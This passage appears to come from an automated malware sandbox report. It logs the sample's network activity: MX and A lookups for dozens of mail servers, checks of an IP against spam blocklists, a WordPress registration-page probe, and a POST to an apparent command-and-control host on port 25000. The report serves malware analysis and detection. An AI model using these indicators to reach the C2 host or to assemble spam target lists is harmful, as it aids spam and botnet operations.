2911 "data": "mx0.123-reg.co.uk",
2912 "type": "MX"
2913
2914
2915
2916
2917 "type": "A",
2918 "request": "mx0.123-reg.co.uk",
2919 "answers":
2920
2921 "data": "94.136.40.61",
2922 "type": "A"
2923
2924
2925 "data": "94.136.40.154",
2926 "type": "A"
2927
2928
2929 "data": "94.136.40.151",
2930 "type": "A"
2931
2932
2933 "data": "94.136.40.150",
2934 "type": "A"
2935
2936
2937 "data": "94.136.40.153",
2938 "type": "A"
2939
2940
2941 "data": "94.136.40.152",
2942 "type": "A"
2943
2944
2945
2946
2947 "type": "MX",
2948 "request": "monroecc.edu",
2949 "answers":
2950
2951 "data": "mail1.monroecc.edu",
2952 "type": "MX"
2953
2954
2955 "data": "mail2.monroecc.edu",
2956 "type": "MX"
2957
2958
2959
2960
2961 "type": "A",
2962 "request": "mail2.monroecc.edu",
2963 "answers":
2964
2965 "data": "150.160.254.109",
2966 "type": "A"
2967
2968
2969
2970
2971 "type": "MX",
2972 "request": "polk.edu",
2973 "answers":
2974
2975 "data": "polk-edu.mail.protection.outlook.com",
2976 "type": "MX"
2977
2978
2979
2980
2981 "type": "A",
2982 "request": "polk-edu.mail.protection.outlook.com",
2983 "answers":
2984
2985 "data": "104.47.33.36",
2986 "type": "A"
2987
2988
2989 "data": "104.47.32.36",
2990 "type": "A"
2991
2992
2993
2994
2995 "type": "A",
2996 "request": "work.a-poster.info",
2997 "answers":
2998
2999 "data": "37.1.206.139",
3000 "type": "A"
3001
3002
3003
3004
3005
3006* Domains:
3007
3008 "ip": "45.60.106.167",
3009 "domain": "cox.net"
3010
3011
3012 "ip": "40.76.4.15",
3013 "domain": "microsoft.com"
3014
3015
3016 "ip": "65.55.92.152",
3017 "domain": "mx2.hotmail.com"
3018
3019
3020 "ip": "184.168.221.59",
3021 "domain": "gotmail.org"
3022
3023
3024 "ip": "66.255.245.195",
3025 "domain": "whitehydraulics.com"
3026
3027
3028 "ip": "54.69.98.195",
3029 "domain": "address.com"
3030
3031
3032 "ip": "104.47.34.36",
3033 "domain": "vas-com.mail.protection.outlook.com"
3034
3035
3036 "ip": "213.105.9.42",
3037 "domain": "ntlworld.com"
3038
3039
3040 "ip": "104.196.248.112",
3041 "domain": "centre.edu"
3042
3043
3044 "ip": "95.128.182.188",
3045 "domain": "iksmedia.ru"
3046
3047
3048 "ip": "161.225.202.27",
3049 "domain": "smtp01.target.com"
3050
3051
3052 "ip": "212.23.88.242",
3053 "domain": "mail.utz.ru"
3054
3055
3056 "ip": "104.47.10.33",
3057 "domain": "eur.olc.protection.outlook.com"
3058
3059
3060 "ip": "125.209.238.100",
3061 "domain": "mx1.naver.com"
3062
3063
3064 "ip": "104.47.14.33",
3065 "domain": "hotmail-com.olc.protection.outlook.com"
3066
3067
3068 "ip": "195.231.241.194",
3069 "domain": "skolekom.dk"
3070
3071
3072 "ip": "46.32.240.39",
3073 "domain": "status-graphite.com"
3074
3075
3076 "ip": "213.120.69.2",
3077 "domain": "mx.lb.btinternet.com"
3078
3079
3080 "ip": "212.54.58.11",
3081 "domain": "mx.mnd.ukmail.iss.as9143.net"
3082
3083
3084 "ip": "87.236.19.4",
3085 "domain": "bardakov.ru"
3086
3087
3088 "ip": "",
3089 "domain": "222.87.245.185.bl.spamcop.net"
3090
3091
3092 "ip": "72.30.35.9",
3093 "domain": "yahoo.com"
3094
3095
3096 "ip": "211.231.108.47",
3097 "domain": "mx3.hanmail.net"
3098
3099
3100 "ip": "98.137.159.25",
3101 "domain": "mta7.am0.yahoodns.net"
3102
3103
3104 "ip": "96.114.157.80",
3105 "domain": "mx1.comcast.net"
3106
3107
3108 "ip": "104.44.194.232",
3109 "domain": "mx1.hotmail.com"
3110
3111
3112 "ip": "167.127.246.35",
3113 "domain": "vap0132.allstate.com"
3114
3115
3116 "ip": "212.23.94.123",
3117 "domain": "utz.ru"
3118
3119
3120 "ip": "94.136.40.61",
3121 "domain": "mx0.123-reg.co.uk"
3122
3123
3124 "ip": "85.10.210.244",
3125 "domain": "wedding-rnd.ru"
3126
3127
3128 "ip": "54.208.23.82",
3129 "domain": "ig.com.br"
3130
3131
3132 "ip": "66.218.87.12",
3133 "domain": "aol.com"
3134
3135
3136 "ip": "195.146.81.131",
3137 "domain": "mail.miki.ru"
3138
3139
3140 "ip": "",
3141 "domain": "222.87.245.185.dnsbl.sorbs.net"
3142
3143
3144 "ip": "77.88.21.89",
3145 "domain": "mx.yandex.net"
3146
3147
3148 "ip": "67.195.228.109",
3149 "domain": "mta5.am0.yahoodns.net"
3150
3151
3152 "ip": "148.163.156.1",
3153 "domain": "mx0a-001b2d01.pphosted.com"
3154
3155
3156 "ip": "91.195.240.87",
3157 "domain": "hillsidefamily.com"
3158
3159
3160 "ip": "68.232.149.160",
3161 "domain": "mx2.hc187824.iphmx.com"
3162
3163
3164 "ip": "151.101.194.187",
3165 "domain": "target.com"
3166
3167
3168 "ip": "148.163.158.123",
3169 "domain": "mxb-00257e01.gslb.pphosted.com"
3170
3171
3172 "ip": "46.252.18.180",
3173 "domain": "lilex-air.com"
3174
3175
3176 "ip": "205.137.77.32",
3177 "domain": "xspz10f564t.sanofi.com"
3178
3179
3180 "ip": "67.231.152.47",
3181 "domain": "mxb-000e4101.gslb.pphosted.com"
3182
3183
3184 "ip": "",
3185 "domain": "222.87.245.185.cbl.abuseat.org"
3186
3187
3188 "ip": "210.89.160.88",
3189 "domain": "naver.com"
3190
3191
3192 "ip": "91.234.98.100",
3193 "domain": "qip.ru"
3194
3195
3196 "ip": "69.252.80.75",
3197 "domain": "comcast.net"
3198
3199
3200 "ip": "",
3201 "domain": "222.87.245.185.zen.spamhaus.org"
3202
3203
3204 "ip": "104.16.120.50",
3205 "domain": "auth.riotgames.com"
3206
3207
3208 "ip": "98.136.96.73",
3209 "domain": "mx-aol.mail.gm0.yahoodns.net"
3210
3211
3212 "ip": "192.102.218.8",
3213 "domain": "barracuda.centre.edu"
3214
3215
3216 "ip": "185.5.250.137",
3217 "domain": "kvartstroy.ru"
3218
3219
3220 "ip": "80.67.18.126",
3221 "domain": "mxlb.ispgateway.de"
3222
3223
3224 "ip": "155.70.28.140",
3225 "domain": "q.com"
3226
3227
3228 "ip": "217.69.141.181",
3229 "domain": "bk.ru"
3230
3231
3232 "ip": "216.129.105.38",
3233 "domain": "mail01.mailtwo.com"
3234
3235
3236 "ip": "150.160.254.109",
3237 "domain": "mail2.monroecc.edu"
3238
3239
3240 "ip": "203.217.239.66",
3241 "domain": "hanmail.net"
3242
3243
3244 "ip": "13.88.22.160",
3245 "domain": "hillyard.com"
3246
3247
3248 "ip": "94.100.180.70",
3249 "domain": "inbox.ru"
3250
3251
3252 "ip": "104.47.53.36",
3253 "domain": "microsoft-com.mail.protection.outlook.com"
3254
3255
3256 "ip": "98.129.229.209",
3257 "domain": "moc.edu"
3258
3259
3260 "ip": "207.211.30.181",
3261 "domain": "us-smtp-inbound-1.mimecast.com"
3262
3263
3264 "ip": "149.255.58.37",
3265 "domain": "mail.janefollis.com"
3266
3267
3268 "ip": "111.202.126.109",
3269 "domain": "sohumx1.sohu.com"
3270
3271
3272 "ip": "98.136.103.23",
3273 "domain": "yahoo.com.tr"
3274
3275
3276 "ip": "62.209.51.88",
3277 "domain": "mxb-00174601.gslb.pphosted.com"
3278
3279
3280 "ip": "208.89.132.27",
3281 "domain": "mail-in-excite.roc2.bluetie.com"
3282
3283
3284 "ip": "40.112.143.140",
3285 "domain": "vas.com"
3286
3287
3288 "ip": "204.79.197.209",
3289 "domain": "hotmail.de"
3290
3291
3292 "ip": "167.206.4.79",
3293 "domain": "mx.optimum.net"
3294
3295
3296 "ip": "67.195.228.94",
3297 "domain": "mta6.am0.yahoodns.net"
3298
3299
3300 "ip": "54.69.179.234",
3301 "domain": "johnlscott.com"
3302
3303
3304 "ip": "177.153.23.241",
3305 "domain": "mx1.ig.correio.biz"
3306
3307
3308 "ip": "217.69.139.200",
3309 "domain": "mail.ru"
3310
3311
3312 "ip": "45.56.121.201",
3313 "domain": "janedwardsmkt.com"
3314
3315
3316 "ip": "213.123.20.90",
3317 "domain": "btinternet.com"
3318
3319
3320 "ip": "23.185.0.2",
3321 "domain": "earthlink.net"
3322
3323
3324 "ip": "34.95.75.127",
3325 "domain": "excite.com"
3326
3327
3328 "ip": "124.108.115.100",
3329 "domain": "netscape.net"
3330
3331
3332 "ip": "198.202.241.222",
3333 "domain": "nasd.com"
3334
3335
3336 "ip": "148.163.149.93",
3337 "domain": "mx0a-0024a201.pphosted.com"
3338
3339
3340 "ip": "104.47.41.36",
3341 "domain": "johnlscott-com.mail.protection.outlook.com"
3342
3343
3344 "ip": "216.239.32.21",
3345 "domain": "nireland.com"
3346
3347
3348 "ip": "207.69.189.231",
3349 "domain": "mx8.earthlink.net"
3350
3351
3352 "ip": "94.100.180.104",
3353 "domain": "mxs.mail.ru"
3354
3355
3356 "ip": "",
3357 "domain": "vnet.ibm.com"
3358
3359
3360 "ip": "104.47.32.36",
3361 "domain": "polk-edu.mail.protection.outlook.com"
3362
3363
3364 "ip": "74.205.140.101",
3365 "domain": "chattem.com"
3366
3367
3368 "ip": "37.1.206.139",
3369 "domain": "work.a-poster.info"
3370
3371
3372 "ip": "",
3373 "domain": "tmail.com"
3374
3375
3376 "ip": "40.112.66.25",
3377 "domain": "linklaters.com"
3378
3379
3380 "ip": "195.231.225.144",
3381 "domain": "mx10.skolekom.dk"
3382
3383
3384 "ip": "172.217.6.78",
3385 "domain": "google.com"
3386
3387
3388 "ip": "104.47.5.36",
3389 "domain": "whitehydraulics-com.mail.protection.outlook.com"
3390
3391
3392 "ip": "202.4.96.26",
3393 "domain": "spamwall.dhakacom.com"
3394
3395
3396 "ip": "221.179.177.36",
3397 "domain": "sohu.com"
3398
3399
3400 "ip": "",
3401 "domain": "rosttreid.ru"
3402
3403
3404 "ip": "172.217.164.101",
3405 "domain": "gmail.com"
3406
3407
3408 "ip": "71.6.142.100",
3409 "domain": "interwork.sdsu.edu"
3410
3411
3412 "ip": "204.79.197.209",
3413 "domain": "hotmail.it"
3414
3415
3416 "ip": "204.79.197.212",
3417 "domain": "hotmail.com"
3418
3419
3420 "ip": "",
3421 "domain": "222.87.245.185.sbl-xbl.spamhaus.org"
3422
3423
3424 "ip": "167.206.148.154",
3425 "domain": "optonline.net"
3426
3427
3428 "ip": "87.229.196.250",
3429 "domain": "mail.radugavl.ru"
3430
3431
3432 "ip": "159.153.191.239",
3433 "domain": "signin.ea.com"
3434
3435
3436 "ip": "",
3437 "domain": "randomwag.com"
3438
3439
3440 "ip": "67.231.156.236",
3441 "domain": "mxa-0009b601.gslb.pphosted.com"
3442
3443
3444 "ip": "",
3445 "domain": "bredtv.ru"
3446
3447
3448 "ip": "52.73.137.222",
3449 "domain": "cxr.mx.a.cloudfilter.net"
3450
3451
3452 "ip": "54.87.207.164",
3453 "domain": "sabre.com"
3454
3455
3456 "ip": "192.124.249.6",
3457 "domain": "polk.edu"
3458
3459
3460 "ip": "206.152.134.65",
3461 "domain": "mx.centurylink.net"
3462
3463
3464 "ip": "",
3465 "domain": "miki.ru"
3466
3467
3468 "ip": "64.188.2.228",
3469 "domain": "landmark-grpbd.com"
3470
3471
3472 "ip": "184.30.101.30",
3473 "domain": "nfm.com"
3474
3475
3476 "ip": "",
3477 "domain": "monroecc.edu"
3478
3479
3480 "ip": "72.167.238.29",
3481 "domain": "smtp.secureserver.net"
3482
3483
3484 "ip": "65.54.188.72",
3485 "domain": "mx3.hotmail.com"
3486
3487
3488 "ip": "",
3489 "domain": "intersources.net"
3490
3491
3492 "ip": "167.127.208.24",
3493 "domain": "allstate.com"
3494
3495
3496 "ip": "77.88.21.89",
3497 "domain": "mx.yandex.ru"
3498
3499
3500 "ip": "",
3501 "domain": "il.uu.net"
3502
3503
3504 "ip": "",
3505 "domain": "radugavl.ru"
3506
3507
3508 "ip": "89.175.32.82",
3509 "domain": "mail.kvartstroy.ru"
3510
3511
3512 "ip": "204.79.197.208",
3513 "domain": "hotmail.co.uk"
3514
3515
3516 "ip": "204.79.197.212",
3517 "domain": "live.it"
3518
3519
3520 "ip": "94.130.209.113",
3521 "domain": "nolive.ir"
3522
3523
3524 "ip": "152.15.47.151",
3525 "domain": "email.uncc.edu"
3526
3527
3528 "ip": "65.55.92.184",
3529 "domain": "mx4.hotmail.com"
3530
3531
3532 "ip": "149.255.58.37",
3533 "domain": "janefollis.com"
3534
3535
3536 "ip": "164.121.250.180",
3537 "domain": "johndeere.com"
3538
3539
3540
3541* Network Communication - ICMP:
3542
3543* Network Communication - HTTP:
3544
3545 "count": 5,
3546 "body": "",
3547 "uri": "http://www.google.com/",
3548 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)",
3549 "method": "GET",
3550 "host": "www.google.com",
3551 "version": "1.1",
3552 "path": "/",
3553 "data": "GET / HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
3554 "port": 80
3555
3556
3557 "count": 1,
3558 "body": "",
3559 "uri": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register",
3560 "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36",
3561 "method": "GET",
3562 "host": "nolive.ir",
3563 "version": "1.0",
3564 "path": "http://nolive.ir/wp-login.php?action=register",
3565 "data": "GET http://nolive.ir/wp-login.php?action=register HTTP/1.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\r\nReferer: http://nolive.ir/wp-login.php?action=register\r\nHost: nolive.ir\r\nConnection: close\r\n\r\n",
3566 "port": 80
3567
3568
3569 "count": 1,
3570 "body": "",
3571 "uri": "http://work.a-poster.info/http://work.a-poster.info:25000/",
3572 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
3573 "method": "POST",
3574 "host": "work.a-poster.info",
3575 "version": "1.1",
3576 "path": "http://work.a-poster.info:25000/",
3577 "data": "POST http://work.a-poster.info:25000/ HTTP/1.1\r\nConnection: close\r\nContent-Length: 21\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: work.a-poster.info\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n",
3578 "port": 80
3579
3580
3581
3582* Network Communication - SMTP:
3583
3584* Network Communication - Hosts:
3585
3586* Network Communication - IRC: